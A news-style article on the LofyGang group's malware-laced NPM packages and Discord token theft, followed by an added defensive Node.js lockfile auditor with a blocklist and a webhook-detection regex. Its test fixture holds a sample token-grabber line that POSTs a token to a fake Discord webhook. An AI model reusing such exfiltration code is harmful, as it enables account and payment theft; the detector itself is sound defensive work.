LofyGang Criminals Infiltrate Discord Accounts
Two YouTube tutorial videos published by the LofyGang hackers teach other threat actors how to use the group's hacking tools. So far, each video has amassed more than 10,000 views.
The operators behind the tools even boast of 24/7 customer support for their clients, all delivered through a LofyGang Discord server established only a year ago. The irony is that the same group is responsible for a damaging scam that targets the Discord messaging platform itself.
The group's Discord server also hosts Discord Nitro giveaways to promote its suite of hacking tools. Members are offered the "Lofy Boost" Discord bot, which buys Discord Nitro using credit card details the group has stolen from other Discord users.
Once a Nitro purchase goes through, the bot also gains access to the buyer's Discord user token, which the hackers can then use in further phishing and account-takeover scams.
Several cybersecurity companies have already observed the misuse of the stolen credit card data, and they note that the group's supply-chain infections were bolstered by promotion of its packages on the GitHub and NPM platforms.
The promoted tools were themselves laced with malware through a backdoor attached to the LofyGang hacking tools. Analysts warned that because the packages are freely accessible on NPM and GitHub, inexperienced hackers can pick them up without realizing they are infected, potentially leading to a massive data breach.
It was also noted that many of the NPM packages are advertised as Discord development packages, while others pose as utilities for working with text, files, and colors.
So far, LofyGang's prolific hacking tools, and the know-how to use them, are being shared on many dark web forums.
Hacking communities have also posted links to GitHub, where threat actors can access programs advertised as a Discord spammer, a Nitro generator, and even a password stealer. The hackers advertise two further menaces to the Discord community as well: a Discord webhook concealing module and a Discord token grabber.
The primary Discord malware created by LofyGang replaces the legitimate version of the Discord client on the infected system with a malicious one that steals credit card details each time the user pays a membership fee.
Researchers analyzing LofyGang's malware note that the malicious code is absent from the packages users install directly; it is fetched later as a dependency. This makes it very hard for users to recognize that the tools they obtained carry malware, and it also makes the malicious code harder for hosting providers such as GitHub to remove.
LofyGang also fragments its operation as much as possible: its packages are published through more than 50 NPM accounts, which lets the group survive a coordinated takedown of any one of them.
Checkmarx researchers have compiled a comprehensive list of the group's packages on GitHub and NPM. They warn that these packages must be avoided and promptly removed wherever unsuspecting victims have installed them.
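As an added example (not code from the original article, from LofyGang, or from Checkmarx), the following Node.js script shows how the two evasion techniques described above, hiding the payload in a transitive dependency and spreading packages across many publisher accounts, can be countered on the consumer side. It walks a package-lock.json, flags any package on a blocklist (the names here are hypothetical; substitute the published list), reports whether a hit was installed directly or only pulled in transitively, flags packages that run install scripts, and scans source text for hard-coded Discord webhook URLs of the kind a token grabber uses to exfiltrate data. The lockfile and the source snippet are constructed for the example.

```javascript
// Added example (not LofyGang's code and not Checkmarx's tooling): audit an npm
// lockfile for (a) packages on a blocklist, including ones present only as
// transitive dependencies, (b) packages that run install scripts, and
// (c) hard-coded Discord webhook URLs in package sources.
// The package names, lockfile and source snippet below are constructed.
'use strict';

// Hypothetical blocklist: these names are made up for the example.
// Replace with the real package names from the published list.
const BLOCKLIST = new Set(['discord-lofy-helper', 'colors-lite-fake']);

// Matches Discord webhook URLs of the form
// https://discord.com/api/webhooks/<id>/<token> (also discordapp.com,
// canary. and ptb. hosts).
const WEBHOOK_RE = /https?:\/\/(?:canary\.|ptb\.)?discord(?:app)?\.com\/api\/webhooks\/(\d+)\/([\w-]+)/g;

// Turn a lockfile v2/v3 "packages" key such as
// "node_modules/a/node_modules/b" into the install chain ["a", "b"].
// Scoped names ("node_modules/@scope/pkg") are kept whole.
function chainFromPath(lockPath) {
  return lockPath
    .split('node_modules/')
    .map((s) => s.replace(/\/$/, ''))
    .filter(Boolean);
}

// Audit a parsed package-lock.json (lockfileVersion 2 or 3). Returns a list of
// findings; each carries the chain of packages that led to the hit.
function auditLockfile(lock, blocklist = BLOCKLIST) {
  const findings = [];
  for (const [lockPath, meta] of Object.entries(lock.packages || {})) {
    if (lockPath === '') continue; // root project entry
    const chain = chainFromPath(lockPath);
    const name = chain[chain.length - 1];
    if (blocklist.has(name)) {
      findings.push({
        kind: 'blocklisted',
        name,
        version: meta.version,
        // depth > 1 means the package arrived only as a transitive dependency
        transitive: chain.length > 1,
        chain,
      });
    }
    if (meta.hasInstallScript) {
      findings.push({ kind: 'install-script', name, version: meta.version, chain });
    }
  }
  return findings;
}

// Scan package source text for embedded Discord webhook URLs. Returns the
// webhook ids found; the token half of the URL is deliberately not returned.
function findWebhookUrls(sourceText) {
  const ids = [];
  for (const m of sourceText.matchAll(WEBHOOK_RE)) ids.push(m[1]);
  return ids;
}

// Constructed lockfile: the blocklisted package is not a direct dependency
// of the project but is pulled in by "discord-embed-tools".
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'my-bot', dependencies: { 'discord-embed-tools': '^1.0.0' } },
    'node_modules/discord-embed-tools': {
      version: '1.0.0',
      dependencies: { 'discord-lofy-helper': '^2.1.0' },
    },
    'node_modules/discord-embed-tools/node_modules/discord-lofy-helper': {
      version: '2.1.0',
      hasInstallScript: true,
    },
    'node_modules/left-pad': { version: '1.3.0' },
  },
};

// Constructed source snippet of the kind a token grabber might contain.
const SAMPLE_SOURCE = `
const hook = "https://discord.com/api/webhooks/123456789012345678/abcDEF_ghi-jkl";
fetch(hook, { method: "POST", body: JSON.stringify({ content: token }) });
`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditLockfile(SAMPLE_LOCK), null, 2));
  console.log('webhook ids:', findWebhookUrls(SAMPLE_SOURCE));
}
```

In practice, feed `auditLockfile` the parsed contents of a real package-lock.json and run `findWebhookUrls` over each file under node_modules; a blocklisted package reported as `transitive: true` is exactly the case the article describes, where the package a user chose looks clean and the payload arrives one level down.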